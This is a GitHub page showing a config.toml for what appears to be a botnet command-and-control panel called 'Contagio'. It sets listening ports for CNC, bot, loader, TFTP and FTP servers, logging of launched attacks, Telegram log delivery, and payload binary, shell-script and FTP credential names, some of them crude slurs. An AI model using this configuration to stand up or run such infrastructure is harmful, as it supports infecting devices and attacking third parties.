-
Notifications
You must be signed in to change notification settings - Fork 7
/
Copy pathconfig.toml
57 lines (40 loc) · 1.04 KB
/
config.toml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
# ====== DO NOT CHANGE =========
Version = "1.0.6"
# ====== DO NOT CHANGE =========
ImportTheme = "./themes/blue_contagio.toml"
CncServer = "0.0.0.0:3399"
BotServer = "0.0.0.0:1344"
LoaderServer = "0.0.0.0:12234"
TftpServer = "0.0.0.0:12345"
FtpServer = "0.0.0.0:2323"
RootLogin = "root"
RELEASE_MODE = false
[Logs]
TelegramBotToken = "" # telegram bot token (@BotFather)
TelegramChatId = "" # telegram chat id (account id/chat id)
SaveLogsInFile = true
SendLogsInTelegram =false
PrintLogsInTerminal = true
NewClientConnectedLog = true
NewAttackStartedLog = true
# if SaveLogsInFile = true
NewClientConnectedFileName = "logs/connections.txt"
NewAttackStartedFileName = "logs/attacks.txt"
[Payload]
BinaryName = "pedo"
ShellName = "hi.sh"
FtpPassword = "gay"
FtpLogin = "gay"
[Auth]
AllowAllIps = true
# MODULES
[Captcha]
Enabled = false
CaptchaLen = 4
Letters = "123456789"
[Animation]
Enabled = true
Letters = "CONTAGIO"
Delay = 500 # In milliseconds
[Modules.date] # custom module
Exec="date +%T"